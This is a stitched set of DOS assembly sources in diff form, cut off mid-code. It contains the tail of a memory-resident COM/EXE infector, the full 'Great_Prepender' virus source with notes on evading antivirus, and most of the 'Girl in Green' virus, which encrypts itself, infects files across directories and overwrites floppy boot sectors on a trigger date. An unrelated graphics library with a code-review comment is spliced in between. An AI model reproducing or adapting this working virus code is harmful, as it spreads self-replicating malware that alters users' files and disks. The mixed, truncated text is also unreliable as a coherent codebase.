infect: cld
mov cs:[nameptr],dx ;save the ptr to the filename
mov cs:[nameptr+2],ds
mov ah,62h ;get segment-adres of PSP
int 21
mov ds,bx ;get seg-adres of environment
mov ax,ds:002Ch
mov ds,ax
mov si,0
envloop: cmp ds:[si],byte ptr 0 ;end of environment?
je verder7
push cs
pop es
mov di,offset envstring
mov bx,0
scloop: mov al,ds:[si] ;check the current env-item
cmpsb
je scv1
inc bx ;characters don't match!
scv1: cmp al,0 ;end of env-item?
jne scloop
cmp bx,0 ;did all characters match?
je return
jmp short envloop
verder7: push cs ;check the filename
pop ds
les di,dword ptr [nameptr]
mov dx,di
mov cx,80 ;search end of filename (-EXT)
mov al,'.'
repnz scasb
mov bx,di
std ;find begin of filename
mov cl,11
mov al,'\'
repnz scasb
cld
je vvv
mov di,dx
jmp short vvv2
vvv: add di,2
vvv2: mov al,'V' ;is it V*.* ?
scasb
je return
mov cl,7 ;is it *AN*.* ?
mov ax,'NA'
ANloop: dec di
scasw
loopnz ANloop
je return
mov si,offset EXE_txt ;is extension 'EXE'?
mov di,bx
mov cx,3
rep cmpsb
jnz verder4
mov byte ptr [comexe],EXESIGN
jmp short verder3
return: ret
verder4: mov si,offset COM_txt ;is extension 'COM'?
mov di,bx
mov cx,3
rep cmpsb
jnz return
mov byte ptr [comexe],COMSIGN
verder3: mov ax,3300h ;get ctrl-break flag
int 21
push dx
xor dl,dl ;clear the flag
mov ax,3301h
int 21
mov ax,3524h ;get int24 vector
int 21
push bx
push es
push cs ;set int24 vec to new handler
pop ds
mov dx,offset ni24
mov ax,2524h
int 21
lds dx,dword ptr [nameptr] ;get file-attribute
mov ax,4300h
call org21
push cx
and cx,0F8h ;clear READ-ONLY-flag
call setattr
jc return1_v
push cs ;open the file
pop ds
lds dx,dword ptr [nameptr]
mov ax,3D02h
int 21
jnc verder2
return1_v: jmp return1 ;something went wrong... :-(
verder2: push cs ;save handle
pop ds
mov [handle],ax
mov bx,[handle] ;get file date & time
mov ax,5700h
int 21
push cx
push dx
call endptr ;get file-length
mov [oldlen],ax
mov [oldlen+2],dx
sub ax,SIGNLEN ;move ptr to end - SIGNLEN
sbb dx,0
mov cx,dx
mov dx,ax
mov al,00h
call ptrmov
mov cx,SIGNLEN ;read the last bytes
mov dx,offset buffer
call flread
jc return2_v
push cs ;compare bytes with signature
pop es
mov di,offset buffer
mov si,offset signature
mov cx,SIGNLEN
rep cmpsb
jz return2_v
call beginptr ;read begin of file
mov cx,BUFLEN
mov dx,offset buffer
call flread
cmp byte ptr [comexe],EXESIGN
jz do_exe
do_com: cmp word ptr [oldlen],MAXTARGET ;check length of file
jnb return2
cmp word ptr [oldlen],MINTARGET
jbe return2
call writeprog ;write program to end of file
jc return2
mov ax,[oldlen] ;calculate new start-adres
add ax,(offset entry - 0103h)
mov byte ptr [buffer],0E9h ;'JMP'
mov word ptr [buffer+1],ax
jmp short verder1
return2_v: jmp short return2
do_exe: call writeprog ;write program to end of file
jc return2
mov ax,[oldlen] ;calculate new length
mov dx,[oldlen+2]
add ax,FILELEN
adc dx,0
mov cl,9 ;put new length in header
shr ax,cl
mov cl,7
shl dx,cl
or ax,dx
inc ax
mov word ptr [buffer+4],ax
mov ax,[oldlen]
add ax,FILELEN
and ax,01FFh
mov word ptr [buffer+2],ax
mov ax,[oldlen] ;calculate new CS & IP
mov dx,[oldlen+2]
mov bx,word ptr [buffer+8]
push ax
mov cl,4
shr ax,cl
mov cl,0Ch
shl dx,cl
add ax,dx
sub ax,bx
mov word ptr [buffer+16h],ax ;put CS in header
pop ax
and ax,000Fh
add ax,(offset entry - 0100h)
mov word ptr [buffer+14h],ax ;put IP in header
verder1: call beginptr ;write new begin of file
mov cx,BUFLEN
mov dx,offset buffer
call flwrite
return2: mov bx,[handle] ;restore file date & time
pop dx
pop cx
mov ax,5701h
int 21
mov bx,[handle] ;close the file
mov ah,3Eh
int 21
return1: pop cx ;restore file-attribute
call setattr
pop ds ;restore int24 vector
pop dx
mov ax,2524h
int 21
pop dx ;restore ctrl-break flag
mov ax,3301h
int 21
ret
;****************************************************************************
;* Gets ASCIIZ-filename from FCB
;****************************************************************************
FCBtoASC: mov si,dx
lodsb
inc al ;extended FCB?
jne normal_FCB
add si,7
normal_FCB: push cs
pop es
xor di,di ;adres for ASCIIZ-name
mov dx,di
mov cx,8
FCB_loop: lodsb ;copy all except spaces
cmp al,' '
je FCB_verder
stosb
FCB_verder: loop FCB_loop
mov al,'.' ;append a '.'
stosb
mov cl,3 ;and the extension
rep movsb
xchg ax,cx ;and a final zero.
stosb
push es
pop ds
ret
;****************************************************************************
;* Changes file-attributes
;****************************************************************************
setattr: lds dx,dword ptr cs:[nameptr]
mov ax,4301h
call org21
ret
;****************************************************************************
;* Writes program to end of file
;****************************************************************************
writeprog: call endptr
mov cx,FILELEN
mov dx,offset begin
; call flwrite ;Hmm, save a few bytes!
; ret
;****************************************************************************
;* Subroutines for reading/writing
;****************************************************************************
flwrite: mov ah,40h
jmp short flvrdr
flread: mov ah,3Fh
flvrdr: push cs
pop ds
mov bx,cs:[handle]
int 21
ret
;****************************************************************************
;* Subroutines for file-pointer
;****************************************************************************
beginptr: mov al,00h ;go to begin of file
jmp short ptrvrdr
endptr: mov al,02h ;go to end of file
ptrvrdr: xor cx,cx
xor dx,dx
ptrmov: mov bx,cs:[handle] ;go somewhere
mov ah,42h
int 21
ret
;****************************************************************************
;* This is where infected files start
;****************************************************************************
entry: call entry2
entry2: pop bx
sub bx,offset entry2 ;CS:BX is begin program - 100h
pushf
cld
cmp byte ptr cs:[bx+offset comexe],COMSIGN
jz entryC
entryE: mov ax,ds ;put old start-adres on stack
add ax,10
add ax,cs:[bx+offset buffer+016h]
push ax
push cs:[bx+offset buffer+014h]
jmp short entcheck
entryC: mov ax,bx ;restore old file-begin
add ax,offset buffer
mov si,ax
mov di,0100
mov cx,BUFLEN
rep movsb
push cs ;put old start-adres on stack
mov ax,0100h
push ax
entcheck: mov ax,0DADAh ;already installed?
int 21h
cmp ah,0A5h
je entstop
call install ;install the program
entstop: iret
;****************************************************************************
;* Install the program at top of memory
;****************************************************************************
install: push ds
push es
xor ax,ax ;get original int21 vector
mov es,ax
mov cx,word ptr es:0084h
mov dx,word ptr es:0086h
mov cs:[bx+offset oi21],cx
mov cs:[bx+offset oi21+2],dx
mov ax,ds ;adjust memory-size
dec ax
mov es,ax
cmp byte ptr es:[0000h],5Ah
jnz cancel
mov ax,es:[0003h]
sub ax,RESPAR
jb cancel
mov es:[0003h],ax
sub es:[0012h], word ptr RESPAR
push cs ;copy program to top
pop ds
mov es,es:[0012h]
mov ax,bx
add ax,0100
mov si,ax
mov di,0100h
mov cx,FILELEN
rep movsb
mov dx,offset ni21 ;set vector to new handler
push es
pop ds
mov ax,2521h
int 21h
cancel: pop es
pop ds
ret
;****************************************************************************
;* Text and Signature
;****************************************************************************
envstring: db 'E=mcý',0 ;put this in your environment!
signature: db 'GOTCHA!',0 ;I have got you! :-)
signend:
end:
cseg ends
end begin

@@ -0,0 +1,93 @@
;
; grafix --- graflib.asm
;
; miscellaneous assembly routines
;
; Written 4/87 by Scott Snyder (ssnyder@romeo.caltech.edu or @citromeo.bitnet)
;
; Modified 5/29/87 by sss to allow for different memory models
;
title graflib
include macros.ah
buflen equ 32768
sseg
endss
dseg
endds
buf segment public 'BUF'
db buflen dup(?)
buf ends
cseg _graflib
pBegin g_bufseg
mov ax, buf
ret
pEnd g_bufseg
pBegin g_fmemcpy
push bp
mov bp,sp
push di
push si
push ds
cld
les di,[bp+argbase]
lds si,[bp+argbase+4]
mov cx,[bp+argbase+8]
shr cx, 1
jnc c1
movsb
c1: rep movsw
pop ds
pop si
pop di
mov sp,bp
pop bp
ret
pEnd g_fmemcpy
pBegin g_fmemset
push bp
mov bp,sp
push di
push si
cld
les di,[bp+argbase]
mov al,[bp+argbase+4]
mov ah,al
mov cx,[bp+argbase+6]
shr cx,1
jnc s1
stosb
s1: rep stosw
pop si
pop di
mov sp,bp
pop bp
ret
pEnd g_fmemset
df_ g_fmemcpy
df_ g_fmemset
df_ g_bufseg
endcs _graflib
end
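Review bot: g_fmemcpy is a forward-only copy (`cld`, then `movsb`/`rep movsw`), so it has memcpy rather than memmove semantics and produces wrong results when the destination overlaps the source at a higher address, yet nothing in the file states the argument layout or that restriction. A header comment at `pBegin g_fmemcpy` such as `; g_fmemcpy(far dst, far src, word n): forward copy, dst/src must not overlap` would document the contract, with the matching `; g_fmemset(far dst, byte val, word n)` for the second routine. g_fmemset also saves and restores `si` although it never uses it, which can be dropped. The `pBegin`/`pEnd`/`argbase` macros come from macros.ah, which is outside this diff, so the frame offsets cannot be checked from here.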
@@ -0,0 +1,183 @@
;******************************************************************************
;
; "I'm the great prepender!" - Jest on Queen by Rajaat / Genesis
;
;******************************************************************************
;
; Virus name : Great_Prepender
; Author : Rajaat
; Origin : United Kingdom, December 1995
; Compiling : Using TASM | Using A86
; |
; TASM /M PREPEND | A86 PREPEND.ASM
; TLINK /T PREPEND |
; Targets : COM files
; Size : 144 bytes
; Resident : No
; Polymorphic : No
; Encrypted : No
; Stealth : No
; Tunneling : No - is not needed for some programs
; Retrovirus : Yes - TBAV, SUSPICIOUS, F-PROT & VSAFE
; Antiheuristics: Yes - TBAV, SUSPICIOUS & F-PROT
; Peculiarities : Shifts the whole file after the virus code
; Rewrites the whole file for infection
; Avoids TBAV & SUSPICIOUS using a 2 byte signature
; Drawbacks : Hangs if host is TSR program
; Hangs if host jumps to PSP:0
; Needs at least 64k free space after host
; Behaviour : When a COM file infected with Great_Prepender virus is
; executed, the virus will search for a COM file in the
; current directory that doesn't have a 0 in the seconds
; field of the file date/time. The virus will read the entire
; file in a block after the current host. Great_Prepender now
; creates a new file with the same name and writes itself at
; the start of the file, and appends the rest of the host
; behind it's own code, thus effectively shifting the whole
; host with 144 bytes. The virus will restore the host in a
; very peculiar way. It modifies the segment registers in a
; way that the host looks if it's aligned at 100h, the normal
; address for COM files to start. It then copies most of the
; DTA over it's own code and executes the host. The stack
; segment is not modified. Because the virus shifts only the
; DTA and doesn't change the memory allocation, resident
; programs have a chance of crashing, because they don't
; allocate 144 bytes of their own code (if function 31h is
; used for the allocation). Great_Prepender is targetted at
; a few resident behaviour blockers, effectively avoiding them.
; The virus also has some tricks to avoid being scanned by a
; few antivirus programs that can perform heuristic scanning.
; It's unknown what this virus might do besides replicate :)
;******************************************************************************
;
; Results with antivirus software
;
; TBFILE - doesn't trigger
; TBSCAN - flags 'p' (packed file)
; TBCLEAN - can't reconstruct without ANTIVIR.DAT
; SVS - doesn't trigger
; SSC - no flags
; F-PROT - no virus found
; F-PROT /ANALYSE - no virus found
; F-PROT /ANALYSE /PARANOID - unusual code
; AVP - virus type Com suspicion (0 bytes)
; VSAFE - doesn't trigger
; NEMESIS - triggers :(
;
;******************************************************************************
;
; Big hello to : Immortal Riot, VLAD, Phalcon/Skism and everyone on #virus who
; deserves it to be greeted by me.
;
;******************************************************************************
.model tiny
.code
org 100h
dta equ 0fd00h-1eh
;===( Main part of the virus )=================================================
im_the_great_prepender:
push ax ; fool TBSCAN and SSC
dec bx
xchg ax,cx
mov ah,1ah
mov dx,dta
int 21h ; move dta to end of segment
mov ah,4eh
find_next: lea dx,filemask
int 21h ; search COM file
jc restore_host ; go restore_host if seek fails
mov ah,4fh
test byte ptr ds:dta+16h,00011111b
jz find_next ; if seconds != 0 go find_next
;===( Infect file )============================================================
mov ah,3dh
mov dx,dta+1eh
int 21h ; open file with read access
xchg ax,bx
xchg ax,cx
push ds
pop ax
add ah,10h
push ax
push ax
pop ds
mov ah,3fh
cwd ; read whole file in next
int 21h ; 64k block
push ax ; store file size
push cs
pop ds
mov ah,3eh
int 21h ; close file
mov ah,3ch
mov dh,0fdh
inc cx
int 21h ; create new file (overwrite)
mov ah,40h
mov dh,01h
mov cl,virus_size
int 21h ; write virus
mov ah,40h
pop cx
pop ds
cwd
int 21h ; write host
push cs
pop ds
mov ax,5701h
mov cx,word ptr ds:dta+16h
mov dx,word ptr ds:dta+18h
and cl,11100000b ; set seconds to 0 and
int 21h ; restore date/time
mov ah,3eh
int 21h ; close file
;===( Return to host )=========================================================
restore_host: push cs ; shift the segment
pop si ; and prepare for dta
add si,09h ; transfer.
push si
push si
mov di,100h-(virus_end-reconstruct)
mov cx,di
push di
push si
pop es
xor si,si
mov di,si
mov dx,80h
retf ; jump to new cs:ip (shifted)
filemask db '*Rajaat.COM',0 ; file mask and author name
reconstruct: rep movsb ; copy dta to new location
pop ds ; (over virus code)
mov ah,1ah
int 21h ; set new dta
pop ax ; clear ax
virus_end equ $
virus_size equ $-im_the_great_prepender
;===( Original shifted host )==================================================
mov ax,4c00h
int 21h
end im_the_great_prepender
+673
@@ -0,0 +1,673 @@
GREEN_GIRL SEGMENT
;
; The "Girl in Green" Virus by The Methyl-Lated Spirit
;
; Alright, here is the low-down on this virus.
; - XOR and NOT encryption
; - Boot block message display <see below>
; - .EXE and .COM infection <in that order>
; - Direct Action <I SWEAR the next will be TSR>
; - INT 042H Handler
; - Teensy weensy little bit of anti-debugging shit
; - Neat activation <boot block, see below>
; - Directory Traversal
; - Restores original Date/Time/Attributes
; - Won't infect Windows .EXE's
; - Won't fuck up too often because of extensive testing of it
;
; A short note on the boot block:
;
; This virus has a boot block, yes, thats right, a boot block!
; On July the 3rd, MY birthday, it will capture a picture of the first
; sector of the disk in A: into a file on the A: called boot.sec, then
; it will overwrite the original bootblock with some code, and when you
; re-boot onto that disk... well, I'll let you see yourself <it aint
; destructive, and that boot.sec is there in case you wanna restore it,
; aren't I a nice guy? *G*>. It was made originally for EGA, but should
; work on other monitors too, although the colours may be weird.
;
; Basically, there is no easy way to go through this virus. It is
; a great desendant from Spaghetti <yes, the food>. It jumps here, there
; everywhere, and, well, I don't believe I've created such a monster.
; Here is a little look see at it. It goes through 2 phases determined
; by the run_count counter. A setting of 1 means it is the first time through
; and that it should look for .EXE files to infect. After that, it is set to
; 2 and it searches for .COM files to infect. It will only infect 1 file on
; each run. After that, when it goes to restart the host, it looks at the
; com_or_exe variable. A setting of 1 means the current file is a .EXE and
; should be restored in that way, and a setting of 2 means the current file
; is a .COM file and should be restored as such. These variables are
; temporarily changed while writing the virus to a new file to reflect
; the hosts new attributes.
;
; Dedications:
; - The knock-out babe on the 424 bus home from school every day
;
; Big time fuck you's to:
; - Peter Doyle. FACE IT! COMPUSERVE SUX!
; - Dick Smith's Shops. HAHAHAHA, THE TOILET BOWL VIRUS STRIKES AGAIN!
; - MYER stores in Perth
; "If you do not remove yourself from that computer, I
; shall have to call security". HAHAHAHAHAHAHAHAHAHA
; - Deth : MYER was fun, but you are a liar and a theif, FUCK YOU
; : You don't NARK on people you did a B&E with just because
; : you're having PMS, get a life arsehole. Liquid Plastic SUX.
;
; Greets to:
; - Ral : Techno roqs just about as much as Jim Morrison
; - Grey : Thanx for the chats dude
; - Rainbow Bright/Telco Ray : Haven't seen u on the net laterly!
; - Shalazar : What is there to say? You're a dude.
; - Titanium Warrior : I'm gunna get you!
; - And all those wonderfull people in GrayLands that gave me this nice
; padded cell so I wouldn't bang my head to hard on the walls
; when I got frustrated debugging this thing :)
;
; Sources:
; - Much code from my first virus, The Toilet Bowl
; - VLAD, the info on how to check for WinEXE files
; - 40-hex article by Dark Avenger on .EXE infections
; - 40-hex article on how boot-sectors work <I just needed
; the offset in memory where they are loaded, 0:7C00>
;
; Reasons for writing it:
; If you're wondering why this is called the "Girl in Green" virus, well, here
; is the answer. I am Methyl, hanging on #AUSSIES alot, and I met a
; BEAUTIFUL girl on da bus, and she was dressed in her green school uniform.
; Well, I'm, of course, gunna ask her out when I get sum guts, but first
; I thought I'd be really kind and create a virus to show my love for her! :>
;
; So if you <you know who you are> were wearing a slazenger suit into
; Karrinyup on Mothers Day, and a phreak in white with the wierdest
; pair of jeans in the world on came up to you and said "Hello", then,
; I LOVE YOU! <evil grin>
;
ORG 0H ;
;
START: ; Host file
MOV AH,4CH ;
INT 21H ;
;
BEGIN: ;
MOV AH,1 ; TbAV will go no further :)
INT 016H ;
;
JMP $+3 ; Stop F-PROT flagging this as a virus
DB 081H, 0E8H, 00H, 00H ;
;
GET_DELTA: ;
MOV BP,SP ;
SUB WORD PTR [SS:BP], OFFSET GET_DELTA
MOV AX,[SS:BP] ;
ADD SP,2 ;
MOV BP,AX ;
;
PUSH DS ; Save PSP segment
PUSH ES ;
MOV DS,CS ; Make ES=DS=CS
MOV ES,DS ;
;
; I've done a little thing here that makes this baby easier to compile.
; When first compiled, the variable enc_or_not will equal 0, and so the
; encrypting routines shan't be run, because the virus has not yet encrypted
; itself. After the first run, this value is changed forever to be 1, so that
; encryption is always carried out on the new infected files. It takes up a
; bit of space, but, like I said, easier to compile.
;
;
CMP BYTE PTR [OFFSET ENC_OR_NOT+BP], 0
JE START_XOR ;
; Call encryption routines
CALL NOTTER ;
CALL XORER ;
;
START_XOR: ; Begin XOR'ing here
MOV BYTE PTR [OFFSET ENC_OR_NOT+BP], 1
; Determine which method will be used later
; to jump back to host, and restores the
; appropriate host bytes.
CMP BYTE PTR [OFFSET COM_OR_EXE+BP], 1
JE EXE_BYTES ;
; This will restore .COM files
LEA SI,[OFFSET ORIG_3+BP]
MOV DI,0100H ;
MOVSB ;
MOVSB ;
MOVSB ;
JMP RESET ;
;
EXE_BYTES: ; This is for .EXE's
MOV WORD PTR [ORIG_CSIP+BP], WORD PTR [TEMP_CSIP+BP]
MOV WORD PTR [ORIG_SSSP+BP], WORD PTR [TEMP_SSSP+BP]
MOV WORD PTR [ORIG_CSIP+BP+02H], WORD PTR [TEMP_CSIP+BP+02H]
MOV WORD PTR [ORIG_SSSP+BP+02H], WORD PTR [TEMP_SSSP+BP+02H]
;
RESET: ; Reset run counter
MOV BYTE PTR [OFFSET RUN_COUNT+BP],1
;
SET_NEW_DTA: ; Make a new DTA
MOV AH, 01AH ;
LEA DX, OFFSET NEW_DTA_AREA+BP
INT 021H ;
;
SAVE_CURRENT_DIR: ; Save current directory for traversal functions
MOV AH, 047H ;
XOR DL, DL ;
LEA SI, OFFSET DIR_BUFFER+BP
INT 021H ;
;
SET_ERRORS: ; Make a new error handler to stop
; write protect errors propping up.
MOV AX, 03524H ;
INT 21H ;
;
LEA DI, OFFSET OLD_ERROR+BP
MOV [DI],ES ;
ADD DI,2 ;
MOV [DI],BX ;
;
MOV AX,02524H ;
LEA DX, OFFSET NEW_ERROR_HANDLER+BP
INT 21H ;
;
MOV ES, DS ; Restore modified ES register
; *********************************************************************
; Activation routine for July 3rd.
;
;
MOV AH, 02AH ; Get date
INT 21H ;
;
MONTH: ;
CMP DH, 07H ; Check if it is July
JE DAY ;
JMP DATE_TEST_PASSED ;
;
DAY: ;
CMP DL, 03H ; Check if it is the 3rd
JE BOOTER ;
JMP DATE_TEST_PASSED ;
; If it got to this point, ITS MY BIRTHDAY!
BOOTER: ;
MOV AX,0201H ; Read old boot block data
MOV CX,1 ;
XOR DX,DX ;
LEA BX,OFFSET OLD_DATA+BP;
INT 013H ;
;
MOV AH,03CH ; Create A:\BOOT.SEC
XOR CX,CX ;
LEA DX,OFFSET BOOT_NAME+BP
INT 21H ;
;
JC QUIT ; Disk not there maybe?
;
XCHG BX,AX ; Write A:\BOOT.SEC
MOV AH,040H ;
MOV CX,512 ;
LEA DX,OFFSET OLD_DATA+BP
INT 021H ;
;
MOV AH,03EH ;
INT 021H ; Close file with boot sector inside
;
MOV AX,0301H ; Write new boot sector to floppy
MOV CX,1 ;
XOR DX,DX ;
LEA BX, OFFSET START_WRITE+BP
INT 13H ;
;
QUIT: ; Reboot computer to load up new boot segment
MOV AX,040H ; Set up for a warm reboot <quicker>
MOV DS,AX ;
MOV AX, 012H ;
MOV [072H], AX ;
;
DB 0EAH ; Do a jump to Offset:Segment following
DB 00,00,0FFH,0FFH ; which is FFFF:0000 as segment:offset
;
;***********************************************************************
; This is the boot_block start
START_WRITE: ;
CLD ;
;
NO_CURSOR: ;
MOV AH,1 ;
MOV CX,02000H ;
INT 010H ;
;
MOV AX,0B800H ; Colour video segment
MOV ES,AX ;
XOR DI,DI ;
LEA SI, 07C00H+(OFFSET MESSAGE-OFFSET START_WRITE)
;
LOOPY_GREEN: ;
MOV CX, 23 ;
REP MOVSW ;
SUB SI, 46 ;
LEA AX, 07C00H+(OFFSET LOOPY_GREEN-OFFSET START_WRITE)
JMP AX ;
;
MESSAGE DB 'I',02,32 ,02,03 ,02,32 ,02,'Y',02,'O',02,'U',02,32,02
DB 'G',02,'I',02,'R',02,'L',02,32 ,02,'I',02,'N',02
DB 32 ,02,'G',02,'R',02,'E',02,'E',02,'N',02,'!',02,32,02
;
; This is the boot_block end
;***********************************************************************
;
DATE_TEST_PASSED: ; Find first file
MOV AH,04EH ;
JMP FINDER ;
;
CHANGE_DIR: ; Go down in directory structure
MOV AH,03BH ;
LEA DX,OFFSET CHANGE_TO+BP
INT 021H ;
JC END_ALL ; In root, no more files
;
MOV AH,04EH ; Since it is is a new dir, find first file
JMP FINDER ;
;
RESET_ATTRIBS: ; Reset file time/date
MOV AX,05701H ;
MOV CX,[OFFSET TIME+BP] ;
MOV DX,[OFFSET DATE+BP] ;
INT 021H ;
RET ;
;
CLOSE_FILE: ; Close file and reset attributes
MOV AH,03EH ;
INT 021H ;
;
MOV AX,04301H ;
MOV CX,[OFFSET ATTRIBS+BP]
LEA DX,OFFSET NEW_DTA_AREA+1EH+BP
INT 021H ;
RET ;
;
FINDER: ; Find first/next routine
LEA DX,[OFFSET FILE_MASK+BP]
MOV CX,0007H ;
INT 021H ;
;
JC CHANGE_DIR ; Change dir if no more files
JMP FILE_FOUND ;
;
DO_OTHER: ; Change file mask. This is the 2nd
; pass, so look for .COM's instead of .EXE's
MOV BYTE PTR [OFFSET RUN_COUNT+BP],2
MOV WORD PTR [OFFSET FILE_MASK+BP+2],'OC'
MOV BYTE PTR [OFFSET FILE_MASK+BP+4],'M'
MOV AH,04EH ;
JMP FINDER ;
;
END_ALL: ;
MOV AH,03BH ; Change to original dir
LEA DX,OFFSET SLASH+BP ;
INT 021H ;
; Do second pass if not done already
CMP BYTE PTR [OFFSET RUN_COUNT+BP], 1
JE DO_OTHER ;
;
; Reload original error handler
MOV DX,[OFFSET OLD_ERROR+BP+02H]
MOV DS,[OFFSET OLD_ERROR+BP]
MOV AX,02524H ;
INT 021H ;
;
POP ES ; Reload original DS, ES
POP DS ;
; Determine host file type
CMP BYTE PTR [OFFSET COM_OR_EXE+BP],1
JE EXE_RESTORE ;
;
MOV AH,01AH ; This will restore a .COM file
MOV DX,080H ;
INT 021H ;
;
MOV DX,0100H ;
JMP DX ;
;
EXE_RESTORE: ; This will restore a .EXE file
;
MOV AH,1AH ; Reset original PSP
MOV DX,080H ;
INT 021H ;
;
MOV AX,ES ; Get CS:IP ready to jump to
ADD AX,010H ;
ADD WORD PTR CS:[BP+ORIG_CSIP+02H],AX
ADD AX, WORD PTR CS:[BP+ORIG_SSSP+02H]
;
CLI ; Restore stack segment and stack pointer
MOV SP, WORD PTR CS:[BP+ORIG_SSSP]
MOV SS,AX ;
STI ;
;
DB 0EAH ; Far Jump Offset:Segment following
;
;***************************************************************************
; Data area
;
ORIG_CSIP DW 0,0 ; Original CS:IP value
ORIG_SSSP DW 0,0 ; Original SS:SP value
;
TEMP_CSIP DW 0,0 ; Temporary CS:IP value
TEMP_SSSP DW 0,0 ; Temporary SS:SP value
;
CHANGE_TO DB '..',0 ; For directory traversal functions
FILE_MASK DB '*.EXE',0 ; File mask <DUH!>
;
BOOT_NAME DB 'A:\BOOT.SEC',00 ; Holds original boot sector of a diskette
;
COM_OR_EXE DB 1 ; 1=exe, 2=com
RUN_COUNT DB 1 ; 1=first, 2=second
;
JUMPING DB 0E9H,00,00 ; Jump construct for a .COM file
ORIG_3 DB 3 DUP(?) ; Original .COM file bytes
;
; End Data area
;***************************************************************************
;
POINTER_MOVER: ;
XOR CX,CX ;
XOR DX,DX ;
MOV AH, 042H ;
INT 021H ;
RET ;
;
COM_TIME: ; Checks for ibmdos.com, ibmbio.com, command.com
; So it works on PC/DOS and MS/DOS
MOV AL, BYTE PTR [OFFSET NEW_DTA_AREA+BP+01EH+2]
CMP AL,'M' ;
JNE NOT_DOS_FILE ;
JMP NOPE ;
;
NOT_DOS_FILE: ;
MOV AL,02H ;
CALL POINTER_MOVER ;
;
SUB DX,1 ; Jump to end of file-1
SBB CX,0 ;
MOV AX,04202H ;
INT 021H ;
;
MOV AH,03FH ; Read last byte of file
MOV CX,1 ;
LEA DX,OFFSET ORIG_3+BP ;
INT 021H ;
;
MOV AL,[OFFSET ORIG_3+BP]
CMP AL,'\' ;
JNE CHECK_IT ; Infect file
;
NOPE: ; Can't infect for some reason or another
CALL RESET_ATTRIBS ;
CALL CLOSE_FILE ;
MOV AH,04FH ;
JMP FINDER ; Already infected (It's my BAAAABBYYYY)
;
CHECK_IT: ;
XOR AL,AL ; Beginning of file
CALL POINTER_MOVER ;
;
MOV AH,03FH ; Read files first 3 bytes
MOV CX,3 ;
LEA DX,[OFFSET ORIG_3+BP]
INT 021H ;
;
MOV AL,[OFFSET ORIG_3+BP]
ADD AL,[OFFSET ORIG_3+BP+1]
CMP AX,'M'+'Z' ;
JE NOPE ;
;
INFECT_COM: ;
MOV AL,02H ;
CALL POINTER_MOVER ;
;
SUB AX,3 ; Calculate jump offset
MOV [OFFSET JUMPING+BP+1],AX
;
XOR AL,AL ; Beginning of file
CALL POINTER_MOVER ;
;
MOV CX,3 ; Write jump bytes
MOV AH,040H ;
LEA DX,OFFSET JUMPING+BP;
INT 021H ;
;
; So that the infected file will look for
; .EXE's on the first run and not .COM's,
; this code here must be added
MOV WORD PTR [OFFSET FILE_MASK+BP+2],'XE'
MOV BYTE PTR [OFFSET FILE_MASK+BP+4],'E'
; Make sure that when the virus runs of it's new
; .COM host, it knows it and isn't running as if
; it was on the old host <i.e. restore host
; as a .COM and not a .EXE>
MOV AL,[OFFSET COM_OR_EXE+BP]
PUSH AX ;
MOV BYTE PTR [OFFSET COM_OR_EXE+BP],2
JMP END_WRITER ;
;
FILE_FOUND: ;
MOV AX, 04300H ; Get and save attribs
LEA DX,[OFFSET NEW_DTA_AREA+BP+01EH]
INT 21H ;
;
MOV [OFFSET ATTRIBS+BP],CX
MOV WORD PTR [OFFSET TIME+BP],[OFFSET NEW_DTA_AREA+BP+016H]
MOV WORD PTR [OFFSET DATE+BP],[OFFSET NEW_DTA_AREA+BP+018H]
;
CHANGE_ATTRIBS_NORMAL: ; Change attributes to NULL
MOV AX,04301H ;
XOR CX,CX ;
LEA DX,[OFFSET NEW_DTA_AREA+BP+01EH]
INT 021H ;
JNC OPEN_FILE ;
MOV AH,04FH ;
JMP FINDER ; Somefink went wrong!
;
OPEN_FILE: ; Open da file
MOV AX,03D02H ;
LEA DX,OFFSET NEW_DTA_AREA+BP+01EH
INT 021H ;
JNC WHAT_WRITE_ROUTINE ;
MOV AH,04FH ;
JMP FINDER ; Somefink else went wrong!
;
WHAT_WRITE_ROUTINE: ; Write to a .COM or .EXE
XCHG BX,AX ; Put file handle in BX
CMP BYTE PTR [OFFSET FILE_MASK+BP+2],'E'
JE CHECK_INFECTED ;
JMP COM_TIME ;
;
CHECK_INFECTED: ; Read in file header
MOV CX,01AH ; .EXE header is (01Ah bytes)
MOV AH,3FH ;
LEA DX,OFFSET FILE_HEADER+BP
INT 021H ;
; Check if it is already infected
CMP WORD PTR [OFFSET FILE_HEADER+BP+012H],'GG'
JNE TEST_WIN ;
JMP NOPE ;
;
NEW_ERROR_HANDLER: ; New INT 024H handler
MOV AL,3 ; Fail system call <VLAD said to do this>
IRET ;
;
TEST_WIN: ;
MOV AX,[OFFSET FILE_HEADER+BP+018H]
CMP AX,040H ;
JB MODIFY_HEADER ; Not windows file
JMP NOPE ; Is windows file
;
MODIFY_HEADER: ; Begin transmorgification of the header
MOV AL,02H ; Get file size for later on
CALL POINTER_MOVER ;
;
PUSH BX ; Save handle
PUSH DX ; Save file size
PUSH AX ;
; TEMP_CSIP = Offset : Segment
LES AX, DWORD PTR [OFFSET FILE_HEADER+BP+014H]
MOV WORD PTR [BP+OFFSET TEMP_CSIP], AX
MOV WORD PTR [BP+OFFSET TEMP_CSIP+02H], ES
; Save stack pointer
; TEMP_SSSP = Offset : Segment
LES AX, DWORD PTR [OFFSET FILE_HEADER+BP+0EH]
MOV WORD PTR [BP+OFFSET TEMP_SSSP],ES
MOV WORD PTR [BP+OFFSET TEMP_SSSP+02H],AX
; Convert header size to bytes
; <originally in paragraphs>
MOV AX, WORD PTR [BP+FILE_HEADER+08H]
MOV CL,04H ;
SHL AX,CL ;
;
XCHG BX,AX ; BX now holds the header size in bytes
;
POP AX ; Get file size into DX:AX
POP DX ;
;
PUSH AX ; Save file size for later AGAIN
PUSH DX ;
;
SUB AX,BX ; Take header size from file size
SBB DX,0 ;
;
MOV CX,010H ; Make it segment:offset form
DIV CX ;
; Write new entry point
MOV WORD PTR [OFFSET FILE_HEADER+BP+014H],DX
MOV WORD PTR [OFFSET FILE_HEADER+BP+016H],AX
; Write new Stack
; Pointer and....
MOV WORD PTR [OFFSET FILE_HEADER+BP+010H],0
; Segment!
MOV WORD PTR [OFFSET FILE_HEADER+BP+0EH],AX
; Write ID bytes
MOV WORD PTR [OFFSET FILE_HEADER+BP+012H],'GG'
;
POP DX ; Get file length
POP AX ;
; Add virus size
ADD AX,OFFSET END_VIRUS-OFFSET BEGIN
ADC DX,0 ;
;
MOV CL,9 ;
PUSH AX ; Save file size+virus size
;
SHR AX,CL ;
ROR DX,CL ;
STC ;
ADC DX,AX ; File size in pages
POP AX ;
AND AH,1 ; MOD 512
; Write new file size
